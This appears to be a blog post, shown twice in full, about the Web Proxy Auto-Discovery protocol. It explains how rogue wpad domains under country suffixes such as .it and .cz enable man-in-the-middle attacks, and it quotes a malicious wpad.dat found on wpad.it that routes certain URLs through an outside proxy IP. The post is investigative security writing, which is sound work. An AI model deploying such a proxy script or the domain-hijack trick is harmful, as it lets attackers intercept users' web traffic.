The misterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part I


The net­work here at Sant’Anna School of Advanced Stud­ies is quite com­pli­cated, so some­times the only way to solve a con­nec­tiv­ity prob­lem is to open Wire­shark and start look­ing around. As you may know, Win­dows boxes are quite chatty and they love to send out Net­BIOS broad­cast pack­ets to resolve names, elect popes, fight back with anti-popes, and so on. But this time I noticed some­thing strange in the broad­cast jam: a PC was con­ti­nously try­ing to reach the inex­is­tent WPAD.SSSUP.IT machine.

I got curi­ous, looked up what WPAD is, and found a cou­ple of inter­est­ing things.

What the heck is this WPAD thing?

It turns out Inter­net Explorer devel­op­ers thought an orga­ni­za­tion might wish to set up elab­o­rate rules for www prox­y­ing. There­fore, they devised a way for net­work admins to auto­con­fig­ure IE proxy set­tings: the Web Proxy Auto­matic Dis­cov­ery Pro­to­col (WPAD).  All major browsers cur­rently sup­port this fea­ture. Note that many appli­ca­tions on Win­dows default to fol­low­ing IE proxy set­tings, so the Man-In-The-Middle poten­tial is very high.

Basi­cally, the browser issues a request for http://wpad.yourdomain.com/wpad.dat 1, which should con­tain a Javascript-like func­tion called Find­Prox­y­ForURL. The func­tion can use wild­card match­ing to spec­ify dif­fer­ent prox­ies for dif­fer­ent addresses. All the gory details are avail­able at www.findproxyforurl.com.

Exploit­ing WPAD

Things can get com­pli­cated if you have a sub­do­main (e.g. if your com­puter is called bob.office.yourdomain.com then wpad.office.yourdomain.com is tried too), but the key point is the same: if some­one hijacks one of your wpad names, sophis­ti­cated Man-In-The-Middle attacks are pos­si­ble. Since net­work admins often for­get to setup a wpad host for their domain, Win­dows may try to query in mul­ti­ple ways — even by broad­cast­ing a Net­BIOS request, which is triv­ial to inter­cept on a local net­work.2

Now, auto-configuration of net­work para­me­ters is very use­ful. Tools like DHCP and traspar­ent prox­ies are in wide use. How­ever, this kind of auto-configuration brings risks: rogue DHCP servers can be trans­par­ent to users and pos­si­bly avoid detec­tion. DHCP is a very well known pro­to­col and net­work admins have long learnt to watch out for sus­pi­cious DHCP activ­ity. WPAD is — in com­par­i­son — a some­what obscure pro­to­col. Buggy pro­grams (and lax poli­cies by domain reg­is­trars) cre­ate a sneaky exploit opportunity.

The DNS beast

As you might have guessed, Win­dows should stop short of the top-level domain .com in its quest for a wpad.dat. How­ever, two issues come into play:

  1. On cer­tain buggy ver­sions, the global wpad.com/wpad.dat is requested. Now, the wpad.com domain has been taken by a (let’s hope) good guy, who chose not to serve a wpad.dat. But what about other Top-Level-Domains (TLDs) like wpad.cz or wpad.it?
  2. Some coun­tries (like Italy) allow you to reg­is­ter domain names right under their national suf­fix (e.g. our beloved School has sssup.it). Other coun­tries (the United King­dom, for instance) chose to mimic the global TLD struc­ture, so their addresses look like google.co.uk, ox.ac.uk, and so on. Some even mix the two policies.

Com­bine these two facts, and you get a big mess. Issue #2 means that when you see a domain name it is very hard to tell which is the TLD and which is the spe­cific domain name. It is not imme­di­ately obvi­ous, for instance, that pi.it is a global TLD (reserved for the ital­ian province of Pisa) while sns.it is the site of our arch-rival, the infa­mous Scuola Nor­male Superiore.

There is no “good” solu­tion to this prob­lem. Mozilla devel­op­ers ended up cret­ing a list of “Effec­tive TLDs“3 which the browser treats like global TLDs.

Each item on this list is an exploit oppor­tu­nity for the WPAD bug. Just reg­is­ter the wpad.it domain and you poten­tially have con­trol of all buggy machines with a .it name

Attack on Italy: the wpad.it mistery

You might think reg­is­trars would think twice before assign­ing a “wpad.country” domain. It turns out that some­times this is not the case.

Some global wpad domains do exist and many of them serve a mali­cious wpad.dat. I’m gath­er­ing data and I’ll post when I have enough to make an inter­est­ing summary.

But take a look at this, the global wpad.it/wpad.dat:

function FindProxyForURL(url, host) {
        //regular expression/complexity supported?
        if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) { return "PROXY 72.55.164.182:80; DIRECT"; }
        return "DIRECT";
}

What the hell is this? It appears the attacker is tar­get­ing some spe­cific web­sites, but the wild­card is quite com­pli­cated. Any idea of what it might be?

UPDATE: found this same file on wpad.cz, full analy­sis in progress.

UPDATE: a more in depth analy­sis here and here

  1. Win­dows can also read its set­tings from DHCP and even from a spe­cial DNS entry. The offi­cial Microsoft doc­u­men­ta­tion is some­what sparse, but detailed infor­ma­tion can be found in the draft sub­mit­ted for stan­dard­iza­tion (pre­vi­ous ver­sion), inTech­Net, in some knowl­edge base arti­cles, and of course on Wikipedia. Another file which can be requested is wspad.dat, which has a dif­fer­ent for­mat. []
  2. Even when a WINS server is present, nam­ing your com­puter WPAD.YOURDOMAIN.COM might do the trick. []
  3. Browsers need this list to enforce cookie restric­tions (what if some­one was able a cookie on all “.co.uk” domains?). The list is now pub­licly main­tained at publicsuffix.org. []

, , , ,

  • Eric Lawrence

    >On cer­tain buggy versions,

    Can you be more spe­cific? Would that be “Unpatched IE5.0″?

  • Eric Lawrence

    >On cer­tain buggy versions,

    Can you be more spe­cific? Would that be “Unpatched IE5.0″?

The misterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part I


The net­work here at Sant’Anna School of Advanced Stud­ies is quite com­pli­cated, so some­times the only way to solve a con­nec­tiv­ity prob­lem is to open Wire­shark and start look­ing around. As you may know, Win­dows boxes are quite chatty and they love to send out Net­BIOS broad­cast pack­ets to resolve names, elect popes, fight back with anti-popes, and so on. But this time I noticed some­thing strange in the broad­cast jam: a PC was con­ti­nously try­ing to reach the inex­is­tent WPAD.SSSUP.IT machine.

I got curi­ous, looked up what WPAD is, and found a cou­ple of inter­est­ing things.

What the heck is this WPAD thing?

It turns out Inter­net Explorer devel­op­ers thought an orga­ni­za­tion might wish to set up elab­o­rate rules for www prox­y­ing. There­fore, they devised a way for net­work admins to auto­con­fig­ure IE proxy set­tings: the Web Proxy Auto­matic Dis­cov­ery Pro­to­col (WPAD).  All major browsers cur­rently sup­port this fea­ture. Note that many appli­ca­tions on Win­dows default to fol­low­ing IE proxy set­tings, so the Man-In-The-Middle poten­tial is very high.

Basi­cally, the browser issues a request for http://wpad.yourdomain.com/wpad.dat 1, which should con­tain a Javascript-like func­tion called Find­Prox­y­ForURL. The func­tion can use wild­card match­ing to spec­ify dif­fer­ent prox­ies for dif­fer­ent addresses. All the gory details are avail­able at www.findproxyforurl.com.

Exploit­ing WPAD

Things can get com­pli­cated if you have a sub­do­main (e.g. if your com­puter is called bob.office.yourdomain.com then wpad.office.yourdomain.com is tried too), but the key point is the same: if some­one hijacks one of your wpad names, sophis­ti­cated Man-In-The-Middle attacks are pos­si­ble. Since net­work admins often for­get to setup a wpad host for their domain, Win­dows may try to query in mul­ti­ple ways — even by broad­cast­ing a Net­BIOS request, which is triv­ial to inter­cept on a local net­work.2

Now, auto-configuration of net­work para­me­ters is very use­ful. Tools like DHCP and traspar­ent prox­ies are in wide use. How­ever, this kind of auto-configuration brings risks: rogue DHCP servers can be trans­par­ent to users and pos­si­bly avoid detec­tion. DHCP is a very well known pro­to­col and net­work admins have long learnt to watch out for sus­pi­cious DHCP activ­ity. WPAD is — in com­par­i­son — a some­what obscure pro­to­col. Buggy pro­grams (and lax poli­cies by domain reg­is­trars) cre­ate a sneaky exploit opportunity.

The DNS beast

As you might have guessed, Win­dows should stop short of the top-level domain .com in its quest for a wpad.dat. How­ever, two issues come into play:

  1. On cer­tain buggy ver­sions, the global wpad.com/wpad.dat is requested. Now, the wpad.com domain has been taken by a (let’s hope) good guy, who chose not to serve a wpad.dat. But what about other Top-Level-Domains (TLDs) like wpad.cz or wpad.it?
  2. Some coun­tries (like Italy) allow you to reg­is­ter domain names right under their national suf­fix (e.g. our beloved School has sssup.it). Other coun­tries (the United King­dom, for instance) chose to mimic the global TLD struc­ture, so their addresses look like google.co.uk, ox.ac.uk, and so on. Some even mix the two policies.

Com­bine these two facts, and you get a big mess. Issue #2 means that when you see a domain name it is very hard to tell which is the TLD and which is the spe­cific domain name. It is not imme­di­ately obvi­ous, for instance, that pi.it is a global TLD (reserved for the ital­ian province of Pisa) while sns.it is the site of our arch-rival, the infa­mous Scuola Nor­male Superiore.

There is no “good” solu­tion to this prob­lem. Mozilla devel­op­ers ended up cret­ing a list of “Effec­tive TLDs“3 which the browser treats like global TLDs.

Each item on this list is an exploit oppor­tu­nity for the WPAD bug. Just reg­is­ter the wpad.it domain and you poten­tially have con­trol of all buggy machines with a .it name

Attack on Italy: the wpad.it mistery

You might think reg­is­trars would think twice before assign­ing a “wpad.country” domain. It turns out that some­times this is not the case.

Some global wpad domains do exist and many of them serve a mali­cious wpad.dat. I’m gath­er­ing data and I’ll post when I have enough to make an inter­est­ing summary.

But take a look at this, the global wpad.it/wpad.dat:

function FindProxyForURL(url, host) {
        //regular expression/complexity supported?
        if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) { return "PROXY 72.55.164.182:80; DIRECT"; }
        return "DIRECT";
}

What the hell is this? It appears the attacker is tar­get­ing some spe­cific web­sites, but the wild­card is quite com­pli­cated. Any idea of what it might be?

UPDATE: found this same file on wpad.cz, full analy­sis in progress.

UPDATE: a more in depth analy­sis here and here

  1. Win­dows can also read its set­tings from DHCP and even from a spe­cial DNS entry. The offi­cial Microsoft doc­u­men­ta­tion is some­what sparse, but detailed infor­ma­tion can be found in the draft sub­mit­ted for stan­dard­iza­tion (pre­vi­ous ver­sion), inTech­Net, in some knowl­edge base arti­cles, and of course on Wikipedia. Another file which can be requested is wspad.dat, which has a dif­fer­ent for­mat. []
  2. Even when a WINS server is present, nam­ing your com­puter WPAD.YOURDOMAIN.COM might do the trick. []
  3. Browsers need this list to enforce cookie restric­tions (what if some­one was able a cookie on all “.co.uk” domains?). The list is now pub­licly main­tained at publicsuffix.org. []

, , , ,